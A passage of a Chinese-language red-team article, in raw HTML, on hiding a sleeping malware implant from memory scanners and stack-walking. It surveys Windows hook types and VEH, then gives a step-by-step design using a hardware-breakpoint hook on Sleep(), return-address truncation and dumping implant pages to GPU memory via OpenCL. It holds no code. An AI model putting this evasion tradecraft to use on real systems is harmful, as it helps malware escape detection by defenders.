style="mso-bookmark:栈回溯欺骗;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">       <o:p> </o:p></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><strong><span style="font-family: 宋体;font-variant: normal;text-transform: none;font-size: 24px;">对抗方案-持续检测</span></strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="font-size: 20px;color: rgb(2, 30, 170);"><strong><span style="color: rgb(2, 30, 170);font-size: 20px;font-family: 宋体;font-variant: normal;text-transform: none;">思路整理</span></strong></span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p>防止反射加载器特征被扫描识别    </p></li><ol class="list-paddingleft-1" style="list-style-type: lower-alpha;"><li><p>–自动探测并移除反射加载器在内存中的残留</p></li></ol><li><p>对抗线程休眠期间的栈回溯和内存扫描</p></li><ol class="list-paddingleft-1" style="list-style-type: lower-alpha;"><li><p>–实现休眠期间栈欺骗</p></li><li><p>–休眠期间植入体内存页不可执行</p></li><li><p>–休眠期间针对植入体做内存转储<span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></p></li></ol></ol><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:可参考的经验;"><span style="font-family:宋体;mso-ascii-font-family:Calibri;font-variant:normal;text-transform:none;"><br/></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="mso-bookmark:思路整理;"></span><span style=""><span style="mso-bookmark:可参考的经验;"><span style="font-family:宋体;mso-ascii-font-family:Calibri;font-variant:normal;text-transform:none;">可参考的经验</span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><strong><span style="font-family: Cambria;font-size: var(--articleFontsize);letter-spacing: 0.034em;">参考案例-1：</span></strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:可参考的经验;"><span style="font-size:12.0pt;font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;text-underline:none;text-decoration:none;"><a href="https://github.com/mgeeky/ThreadStackSpoofer/tree/master" target="_blank">https://github.com/mgeeky/ThreadStackSpoofer/tree/master</a></span></span></span><span style=""><span style="mso-bookmark:可参考的经验;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">；</span></span></span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p>其利用hook Sleep()截断栈帧，以对抗线程休眠期间的栈回溯探测。该项目使用的inline hook内存特征明显，主动扫描很容易发现；</p></li><li><p>该项目的MySleep()中没有对内存中的植入体和加载器残留做处理。</p></li></ol><p style="line-height: 1.5em;margin-bottom: 16px;"><strong><span style=""><span style="mso-bookmark:可参考的经验;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;"><br/></span></span></span></strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><strong><span style=""><span style="mso-bookmark:可参考的经验;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">参考案例-2：</span></span></span></strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:可参考的经验;"><span style="font-size:12.0pt;font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;text-underline:none;text-decoration:none;"><a href="https://github.com/vxunderground/VXUG-Papers/blob/main/GpuMemoryAbuse.cpp" target="_blank">https://github.com/vxunderground/VXUG-Papers/blob/main/GpuMemoryAbuse.cpp</a></span></span></span><span style=""><span style="mso-bookmark:可参考的经验;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">；利用CUDA将内存转储至VRAM。</span></span></span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p>该项目利用CUDA API仅适用于NVIDIA平台，通用性较低；</p></li><li><p>该项目是一个测试Demo，仅实现了VRAM读写功能，无法直接整合到Loader中。</p><p><br/></p></li></ol><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:关键技术说明;"><span style="font-family:宋体;mso-ascii-font-family:Calibri;font-variant:normal;text-transform:none;"></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="font-size: 20px;color: rgb(2, 30, 170);"><strong><span style="color: rgb(2, 30, 170);font-size: 20px;font-family: 宋体;font-variant: normal;text-transform: none;">关键技术说明</span></strong></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><strong><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;">“无内存特征”hook</span></span></span></span></strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">简单对常见的R3 hook技术做个总结。</span></span></span></span></p><p><strong>Win32 hook（Windows提供的API，局限性很强）</strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">Windows提供了一套API，允许插入钩子来监视特定类型的事件，如键盘输入、鼠标移动等。这些钩子可以是全局的或特定于线程的。</span></span></span></span></p><p><strong>回调函数hook（可以理解为Win32 hook的扩充，功能强大但并不能用于WinAPI）</strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">可用于监控和干预许多系统级和应用级事件。除了监控键盘和鼠标事件之外，它们还可以用于                <br/>监控消息队列：通过设置消息钩子（例如，WH_GETMESSAGE和WH_CALLWNDPROC），可以监控和修改应用程序的消息队列中的消息。               <br/>监测系统状态变化：如设置WH_SHELL钩子来监控系统的各种状态变化，例如窗口的创建和销毁、系统的休眠和唤醒等。               <br/>截获窗口活动：例如，通过WH_CBT（计算机基础训练钩子）可以监控窗口的创建、移动、大小调整等事件。               <br/>监控低级别的鼠标和键盘输入：如之前例子中的WH_KEYBOARD_LL和WH_MOUSE_LL，这些钩子可以用来实现全局的键盘和鼠标输入监控，甚至在应用程序处理它们之前拦截这些输入。</span></span></span></span>    <o:page></o:page></p><p><strong>Inline hook（最通用，但需要对内存作hot patch）</strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">通过修改目标函数的首部字节（通常是替换为跳转指令），将执行流重定向到钩子处理函数。当执行到达目标函数时，会跳转执行自定义的钩子函数。这种方式需要处理原始指令的备份和执行恢复，以确保目标函数的正常执行。</span></span></span></span></p><p><strong>IAT/EAT hook（对动态加载的库不适用，且影响DLL的签名校验，针对ASLR还需要重定位）</strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">通过修改应用程序的导入地址表（IAT）/DLL的导出地址表（EAT），将导入/导出的函数地址改为钩子函数的地址。主要用于拦截应用程序对DLL导出函数的调用/影响所有调用该DLL函数的应用程序。</span></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><strong><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:局限;"><span style="font-family:宋体;mso-ascii-font-family:Calibri;font-variant:normal;text-transform:none;">局限</span></span></span></span></span></strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:局限;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">上面常见的hook多多少少都有一些缺陷，大家都在用的inline hook也因为需要修改内存而导致非常容易被检测到，不管是前面提到过的</span></span></span></span></span><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:局限;"><span style="font-size:12.0pt;font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;text-underline:none;text-decoration:none;">线程调用堆栈混淆的项目</span></span></span></span></span><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:局限;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">中使用到的hook还是</span></span></span></span></span><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:局限;"><span style="font-size:12.0pt;font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;text-underline:none;text-decoration:none;">minhook</span></span></span></span></span><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:局限;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">这类开源的hook框架都是用的这种传统的方式。                 <br/>其实还有一种hook方式被忽略但又几乎天天都在用，那就是调试器。我们使用调试器的时候下个断点，轻轻松松就可以单步调试并且任意修改内存，这不也就实现了hook的效果？那么我们就需要研究一下调试器是怎么做到拦截程序执行流程的，并尝试模拟这一过程。</span></span></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="mso-bookmark:局限;"></span><strong><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:软件断点;"><span style="font-family:宋体;mso-ascii-font-family:Calibri;font-variant:normal;text-transform:none;">软件断点</span></span></span></span></span></strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:软件断点;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">软件断点主要通过修改目标程序的代码来实现，具体来说是通过替换目标地址处的指令字节为特定的断点指令。在x86架构下，这个特定的断点指令通常是</span></span></span></span></span><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:软件断点;"><span style="">INT 3</span></span></span></span></span><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:软件断点;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">（0xCC），当程序执行到达目标地址时，</span></span></span></span></span><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:软件断点;"><span style="">INT 3</span></span></span></span></span><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:软件断点;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">指令会触发一个异常，通常是一个断点异常（</span></span></span></span></span><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:软件断点;"><span style="">EXCEPTION_BREAKPOINT</span></span></span></span></span><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:软件断点;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">）。在替换目标地址处的指令之前，需要由调试器来保存该地址处的原始指令字节。                 <br/>当断点触发时，控制权会转移到调试器，也可以是自定义的处理程序，在这个处理程序中可以执行自定义逻辑。                 <br/>下图说明了软件断点的实现原理。                 <br/></span></span></span></span></span>  </p><p style="text-align: center;"><img class="rich_pages wxw-img" data-backh="301" data-backw="578" data-galleryid="" data-imgfileid="100000524" data-ratio="0.5203703703703704" data-s="300,640" style="width: 100%;height: auto !important;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=2c8ea780&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFIaDXzmCntDiaTPdQrYntOesJPKq5dheoHFP4hKuvxKf40dznExbdpew%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="line-height: 1.5em;margin-bottom: 16px;"><o:page></o:page></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="mso-bookmark:软件断点;"></span><strong><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:硬件断点;"><span style="font-family:宋体;mso-ascii-font-family:Calibri;font-variant:normal;text-transform:none;">硬件断点</span></span></span></span></span></strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:硬件断点;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">硬件断点是一种使用CPU硬件特性来实现的断点，它允许在不修改目标程序代码的情况下，监控程序的执行流、数据访问或处理器状态的变化。硬件断点通常通过使用CPU的调试寄存器（在x86架构中是DR0、DR1、DR2、DR3、DR6和DR7）来实现。                 <br/>虽然刚刚提到的软件断点比起使用强制跳转指令（JMP）实现的Inline hook而言只需要修改一个单字节指令，但本质上依然需要修改内存，因此并没有达到真正“内存无痕”的效果。我们还是要使用硬件断点来实现，后面会详细说明硬件断点的使用方法和实现原理。</span></span></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="mso-bookmark:硬件断点;"></span><strong><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:veh;"><span style="font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;">VEH</span></span></span></span></span></strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:veh;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">VEH（Vectored Exception Handling）是Windows操作系统中的一种异常处理机制，它允许开发者在应用程序或DLL中注册一个或多个异常处理函数，这些函数会在传统的结构化异常处理（SEH, Structured Exception Handling）之前被调用。VEH提供了一种机制，程序可以通过它捕获和处理各种异常，包括访问违规、除零错误和其他严重错误，甚至包括软件断点（INT 3）和单步执行（Trap Flag）产生的异常。  </span></span></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:veh;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">               <br/>VEH通过</span></span></span></span></span><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:veh;"><span style="">AddVectoredExceptionHandler()</span></span></span></span></span><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:veh;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">和</span></span></span></span></span><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:veh;"><span style="">RemoveVectoredExceptionHandler()</span></span></span></span></span><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:veh;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">这两个API函数来管理异常处理函数（称为Vectored Exception Handler）。当异常发生时，系统会按照这些处理函数被添加的顺序调用它们，直到某个处理函数处理了该异常（返回</span></span></span></span></span><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:veh;"><span style="">EXCEPTION_CONTINUE_EXECUTION</span></span></span></span></span><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:无内存特征hook;"><span style="mso-bookmark:veh;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">），或者所有的处理函数都没有处理该异常，最后交给SEH（如果存在）来处理。</span></span></span></span></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:访问设备内存;"><span style="font-family:宋体;mso-ascii-font-family:Calibri;font-variant:normal;text-transform:none;"></span></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="mso-bookmark:无内存特征hook;"></span><span style="mso-bookmark:veh;"></span><strong><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:访问设备内存;"><span style="font-family:宋体;mso-ascii-font-family:Calibri;font-variant:normal;text-transform:none;">访问设备内存</span></span></span></span></strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:访问设备内存;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">前面提到的案例中实现的使用GPU设备隐藏恶意代码的demo是基于CUDA开发的，但CUDA仅适用于安装有Nvidia GPU设备的环境。为了更加通用，我决定使用OpenCL重构。</span></span></span></span>    <o:page></o:page></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:访问设备内存;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">OpenCL的运行环境会集成在任何一款GPU的驱动程序包中，也就是说只要电脑上有GPU（不管是集成的还是独立的）都可以直接使用OpenCL的API；至于没有GPU的设备（如服务器/虚拟机）也可以使用</span></span></span></span><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:访问设备内存;"><span style="">msiexec</span></span></span></span><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:访问设备内存;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">无感知一键部署OpenCL的CPU Runtime，计算设备将会在CPU上模拟运行，分配的“显存”也是由OpenCL Runtime管理的一块单独的内存，和调用者进程依旧是相互独立的。          </span></span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:访问设备内存;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">     <br/>下图是OpenCL的执行模型（Global Memory指的是GPU的VRAM，参与数据处理和运算的单元只能直接访问VRAM）。  </span></span></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000525" data-ratio="0.9712962962962963" data-s="300,640" style="height: auto !important;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=ac28279c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFicIcnQm7P3NubfIMrAZ94DrMay0icSouZJT39aLpOVRooa6q7ItLrMIg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><span style="font-family: Cambria;font-size: 12pt;text-align: left;text-indent: 0pt;letter-spacing: 0.034em;">   </span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:访问设备内存;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">这里再简单介绍一下同类可合法调用GPU设备的API。               <br/>OpenCL与CUDA：都是用于并行计算，但CUDA仅限于NVIDIA GPU，而OpenCL是开放标准，支持更广泛的硬件（包含CPU和FPGA）。</span></span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:访问设备内存;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">               <br/>下图是OpenCL与CUDA框架的对比。这里的OpenCL driver和runtime在任何一款显卡驱动中都会集成，而CUDA driver和runtime只有Nvidia显卡才有；二者最大区别就是OpenCL由于需要保证跨平台兼容性，是通过OpenCL驱动程序间接访问设备的，而CUDA是Nvidia为自家设备研发，所以可以直接使用自己的驱动访问硬件设备。                               </span></span></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000526" data-ratio="0.6962962962962963" data-s="300,640" style="height: auto !important;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=72e41613&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFzxpYFYnWXCETsDzcc6liat6grwiculVeYF1uF7pn5e3L9qibibPuqKSYjg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:关键技术说明;"><span style="mso-bookmark:访问设备内存;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">OpenGL、DX12和Vulkan：这三者都用于图形渲染，但OpenGL是更早的标准，DX12是仅限于Windows和Xbox的微软技术，而Vulkan是最新的、旨在提供跨平台支持并优化硬件性能的API。               <br/>OpenGL和OpenCL：虽然名称相似且都由Khronos Group管理，但它们服务于不同目的：OpenGL专注于图形，OpenCL专注于通用计算。</span></span></span></span>    <o:page></o:page></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="font-family:宋体;mso-ascii-font-family:Calibri;font-variant:normal;text-transform:none;"></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="color: rgb(2, 30, 170);font-size: 20px;"><strong><span style="font-size: 20px;color: rgb(2, 30, 170);font-family: 宋体;font-variant: normal;text-transform: none;">技术实现</span></strong></span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p>准备工作——创建全局OpenCL内存对象，并设置Sleep()的硬件断点，等待程序调用Sleep()；</p></li><li><p>在自定义VEH中记录当前植入体内存页相关信息并将反射加载器残留内存页释放；</p></li><li><p>修改VEH暂存的线程上下文结构体中的RIP，引导其返回到自定义Sleep()方法；</p></li><li><p>在自定义Sleep()方法中将可疑内存页写入OpenCL内存对象的缓冲区，通过OpenCL库写入VRAM；</p></li><li><p>在自定义Sleep()方法中关闭内存页X权限；</p></li><li><p>在自定义Sleep()方法中暂存返回地址并将真实返回地址覆盖为0x00，截断栈帧；</p></li><li><p>在自定义Sleep()方法中调用真正的Sleep();    <o:page></o:page></p></li><li><p>在自定义Sleep()方法返回前恢复内存页。访问OpenCL内存对象的缓冲区，取出之前转储的数据；重新开启内存页X权限；恢复暂存的返回地址。</p></li><li><p>正常返回到植入体代码的CALL Sleep()下一条指令位置，进入下一循环周期。</p><p><br/></p></li></ol><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">              <o:p> </o:p></span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-imgfileid="100000517" data-ratio="1.0123304562268804" style="width: 560.01001px;height: auto !important;" data-type="png" data-w="811" src="https://wechat2rss.xlab.app/img-proxy/?k=87c29a0e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkF8ullsWx8kfoVROsxmHwJEl5cK0ETSzzvjO35VjTfXzBicQRA8QPO1icw%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">总的来说，该植入体隐藏技术方案是基于之前在Defence.one会议上分享的动态加解密方案的变体，将内存中加密改成了转储VRAM，将常规的inline hook换成了没有内存特征的硬件断点hook。</span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">注意：由于该方案是基于对特定函数调用进行Hook实现的，因此建议</span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;font-weight:bold;mso-bidi-font-weight:bold;font-style:italic;mso-bidi-font-style:italic;">内置在作为“外壳”的Loader中</span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">。可与前面的方案配合实现互补。</span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><strong><span style=""><span style="mso-bookmark:实现;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">参考方案1：</span></span></span>    </strong><o:page></o:page></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-imgfileid="100000515" data-ratio="0.5564814814814815" style="width: 560.01001px;height: auto !important;" data-type="jpeg" data-w="1080" 